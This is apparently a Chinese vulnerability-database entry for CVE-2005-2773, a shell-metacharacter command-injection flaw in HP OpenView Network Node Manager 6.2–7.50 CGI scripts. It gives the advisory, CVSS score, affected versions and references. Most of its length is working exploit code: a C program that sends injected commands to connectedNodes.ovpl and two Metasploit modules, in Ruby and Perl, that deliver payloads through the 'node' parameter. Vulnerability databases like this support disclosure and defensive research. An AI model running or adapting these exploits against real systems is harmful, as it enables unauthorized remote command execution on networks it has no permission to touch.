CVE-2005-2773
CVSS7.5
发布时间 :2005-09-02 19:03:00
修订时间 :2016-10-17 23:30:08
NMCOEP    

[原文]HP OpenView Network Node Manager 6.2 through 7.50 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) node parameter to connectedNodes.ovpl, (2) cdpView.ovpl, (3) freeIPaddrs.ovpl, and (4) ecscmg.ovpl.


[CNNVD]HP OpenView网络节点管理器远程命令执行漏洞(CNNVD-200509-028)

        HP OpenView网络节点管理器(OV NNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。
        HP OpenView Network Node Manager 6.2到7.50版本,OV NNM对用户请求的处理上存在输入验证漏洞,远程攻击者可以通过 (1) node parameter to connectedNodes.ovpl, (2) cdpView.ovpl, (3) freeIPaddrs.ovpl, and (4) ecscmg.ovpl中的 Shell元字符执行任意的命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:hp:openview_network_node_manager:6.4::nt_4.x_windows_2000
cpe:/a:hp:openview_network_node_manager:6.4::solaris
cpe:/a:hp:openview_network_node_manager:6.2HP OpenView Network Node Manager 6.2
cpe:/a:hp:openview_network_node_manager:6.4HP OpenView Network Node Manager 6.4
cpe:/a:hp:openview_network_node_manager:6.10HP OpenView Network Node Manager 6.10
cpe:/a:hp:openview_network_node_manager:6.31HP OpenView Network Node Manager 6.31
cpe:/a:hp:openview_network_node_manager:6.41HP OpenView Network Node Manager 6.41
cpe:/a:hp:openview_network_node_manager:7.0.1::windows_2000_xp
cpe:/a:hp:openview_network_node_manager:6.41::solaris
cpe:/a:hp:openview_network_node_manager:7.50HP OpenView Network Node Manager 7.50
cpe:/a:hp:openview_network_node_manager:6.31::nt_4.x_windows_2000
cpe:/a:hp:openview_network_node_manager:6.2::nt_4.x_windows_2000
cpe:/a:hp:openview_network_node_manager:7.50::windows_2000_xp
cpe:/a:hp:openview_network_node_manager:6.2::solaris
cpe:/a:hp:openview_network_node_manager:7.50::solaris

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2773
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2773
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-028
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112499121725662&w=2
(UNKNOWN)  BUGTRAQ  20050825 Portcullis Security Advisory 05-014 HP Openview Remote Command
http://www.securityfocus.com/advisories/9150
(UNKNOWN)  HP  SSRT051023
http://www.securityfocus.com/bid/14662
(UNKNOWN)  BID  14662
http://xforce.iss.net/xforce/xfdb/21999
(PATCH)  XF  hp-openview-node-manager-command-execution(21999)

- 漏洞信息

HP OpenView网络节点管理器远程命令执行漏洞
高危 输入验证
2005-09-02 00:00:00 2005-10-20 00:00:00
远程  
        HP OpenView网络节点管理器(OV NNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。
        HP OpenView Network Node Manager 6.2到7.50版本,OV NNM对用户请求的处理上存在输入验证漏洞,远程攻击者可以通过 (1) node parameter to connectedNodes.ovpl, (2) cdpView.ovpl, (3) freeIPaddrs.ovpl, and (4) ecscmg.ovpl中的 Shell元字符执行任意的命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1188)

HP OpenView Network Node Manager <= 7.50 Remote Exploit (EDBID:1188)
multiple remote
2005-08-30 Verified
0 Lympex
N/A [点击下载]
/*
Web Browser info:
	/OvCgi/connectedNodes.ovpl?node=a|command|
	/str0ke
*/

/*
##################################################################################
# HP OpenView Network Node Manager 6.2, 6.4, 7.01, 7.50 Remote Command Execution #
##################################################################################

Name: HP OV NNM Remote Command Execution Exploit
File: HP_OV_NNM_RCE.c
Description: Exploit
Author: Lympex
Contact:
+ Web: http://l-bytes.net
+ Mail: lympex[at]gmail[dot]com
Date: 30/08/2005
Extra: Compiled with Visual C++ 6.0

############################################################################
#SecurityTracker Alert ID:  1014791                                        #
#SecurityTracker URL:  http://securitytracker.com/id?1014791               #
#CVE Reference:  GENERIC-MAP-NOMATCH                                       #
#Updated:  Aug 25 2005                                                     #
#Original Entry Date:  Aug 25 2005                                         #
#Impact:  Execution of arbitrary code via network, User access via network #
############################################################################

*/

//headers
#include <stdio.h>//In/Out
#include <winsock2.h>//sockets functions
#include <stdlib.h>//memory functions
#include <string.h>//strlen,strcat,strcpy

#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"

#define Port 3443 //port for connect to HP OV NNM
#define SIZE 2048 //buffer size to receive the data

/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
	/*struct for make the socket*/
	WSADATA wsaData;
	SOCKET Winsock;//listener socket
	/*two structures for connect*/
	struct sockaddr_in Winsock_In;
	struct hostent *Ip;

	/*start the socket*/
	WSAStartup(MAKEWORD(2,2), &wsaData);
	/*make*/
	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

	//check socket status
	if(Winsock==INVALID_SOCKET)
	{
		/*exit*/
		WSACleanup();
		return -1;
	}

	/*complete the struct*/
	Ip=gethostbyname(Host);
	Winsock_In.sin_port=htons(puerto);
	Winsock_In.sin_family=AF_INET;
	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

	/*connect*/
	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
	{
		/*end*/
		WSACleanup();
		return -1;
	}

	return Winsock;
}

/*MASTER FUNCTION*/
int main(int argc, char *argv[])
{
	/*the socket*/
	SOCKET sock;
	/*make the evil buffer to send the request*/
	char evil_request[]="GET /OvCgi/connectedNodes.ovpl?node=a| ";
	char evil_request2[]=" |";
	char *evil;
	/*to receive the data*/
	char buf[SIZE];
	unsigned int i;

	printf("\n +[ HP OV NNM Remote Command Execution ]+ by Lympex");
    printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
	printf("\n-----------------------------------------------------\n");

	if(argc!=3)//HP_OV_NNM_RCE <host> <command>
	{
		printf("\n[+] Usage: %s <host> <command>",argv[0]);
		printf("\nImportant: Do not include \x22<\x22 and \x22>\x22 chars\n");
		return 0;
	}

	for(i=0;i<strlen(argv[2]);i++)
	{
		if(argv[2][i]=='<' || argv[2][i]=='>')
		{
			printf("\n[!] Error - You have included \x22<\x22 and/or \x22>\x22 chars\n");
			return 1;
		}
	}

	printf("\n[+] Connecting  %s:%d...",argv[1],Port);

	/*start the exploit*/
	sock=Conecta(argv[1],Port);//connect
	if(sock==-1)
	{
		printf("Error\n");
		return 1;
	}

	printf("OK");

	/*make the EVIL request*/
	evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
	strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");

	//sends it
	send(sock,evil,strlen(evil),0);

	buf[recv(sock,buf,SIZE,0)]='\0';

	//show the data
	printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);

	WSACleanup();
	LocalFree(buf);
	LocalFree(evil);
	return 0;
}

// milw0rm.com [2005-08-30]
		

- 漏洞信息 (16887)

HP Openview connectedNodes.ovpl Remote Command Execution (EDBID:16887)
linux remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: openview_connectednodes_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP Openview connectedNodes.ovpl Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				HP OpenView connectedNodes.ovpl CGI application. The results of the command
				will be displayed to the screen.
			},
			'Author'         => [ 'Valerio Tesei <valk[at]mojodo.it>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					['CVE', '2005-2773'],
					['OSVDB', '19057'],
					['BID', '14662'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 25 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('URI', [true, "The full URI path to connectedNodes.ovpl", "/OvCgi/connectedNodes.ovpl"]),
			], self.class)
	end

	def exploit

		# Trigger the command execution bug
		res = send_request_cgi({
				'uri'      => datastore['URI'],
				'vars_get' =>
					{
						'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!
					}
				}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print("")

			m = res.body.match(/YYY(.*)YYY/)

			if (m)
				print_status("Command output from the server:")
				print(m[1])
			else
				print_status("This server may not be vulnerable")
			end

		else
			print_status("No response from the server")
		end
	end

end
		

- 漏洞信息 (F82362)

HP Openview connectedNodes.ovpl Remote Command Execution (PacketStormID:F82362)
2009-10-30 00:00:00
Valerio Tesei  
exploit,arbitrary,cgi
CVE-2005-2773
[点击下载]

This Metasploit module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP Openview connectedNodes.ovpl Remote Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution vulnerability in the
			HP OpenView connectedNodes.ovpl CGI application. The results of the command
			will be displayed to the screen.
			},
			'Author'         => [ 'Valerio Tesei <valk[at]mojodo.it>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-2773'],
					['OSVDB', '19057'],
					['BID', '14662'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 25 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('URI', [true, "The full URI path to connectedNodes.ovpl", "/OvCgi/connectedNodes.ovpl"]),
				], self.class)
	end

	def exploit
	
		# Trigger the command execution bug
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' => 
			{
				'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!
			}
		}, 25)		
		
		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print("")
			
			m = res.body.match(/YYY(.*)YYY/)
			
			if (m)
				print_status("Command output from the server:")
				print(m[1])
			else
				print_status("This server may not be vulnerable")
			end
			
		else
			print_status("No response from the server")
		end
	end
	
end

    

- 漏洞信息 (F42295)

openview_connectednodes_exec.pm.txt (PacketStormID:F42295)
2005-12-14 00:00:00
Valerio Tesei  
exploit,arbitrary,cgi
CVE-2005-2773
[点击下载]

This Metasploit module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will not be displayed to the screen.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::openview_connectednodes_exec;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'HP OpenView connectedNodes.ovpl Command Execution',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'Valerio Tesei <valk@mojodo.it>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'DIR' => [1, 'DATA', 'Directory of connectedNodes.ovpl script', '/cgi-bin/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary command execution vulnerability in the
HP OpenView connectedNodes.ovpl CGI application. The results of the command
will not be displayed to the screen.
}),

'Refs' =>
[
['OSVDB', '19057'],
['BID', '14662'],
['CVE', '2005-2773'],
],

'Payload' =>
{
'Space' => 1024,
'Keys' => ['cmd'],
},

'Keys' => ['openview'],
'DisclosureDate' => 'Aug 25 2005',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $dir = $self->GetVar('DIR');
my $cmd = $self->URLEncode( $self->GetVar('EncodedPayload')->RawPayload );

my $url = $dir.'connectedNodes.ovpl?node=%3B+'.$cmd.'+%7C+tr+%22%5Cn%22+%22%A3%22';

my $request =
"GET $dir HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $target_host:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

$self->PrintLine("[*] Establishing a connection to the target...");
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}


$self->PrintLine("[*] Requesting connectedNodes.ovpl...");
$s->Send($request);

$self->PrintLine("[*] Executing command...");
my $results = $s->Recv(-1, 20);
$s->Close();

return;
}

sub URLEncode {
my $self = shift;
my $data = shift;
my $res;

foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}

1;
    

- 漏洞信息

19057
HP Openview Network Node Manager connectedNodes.ovpl node Variable Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

OpenView Network Node Manager contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the connectedNodes.ovpl script not properly sanitizing user input supplied to the 'node' parameter. This may allow an attacker to include a file from an arbitrary remote host that contains commands which will be executed by the vulnerable script with the same privileges as the web server.

- 时间线

2005-08-25 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, HP has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站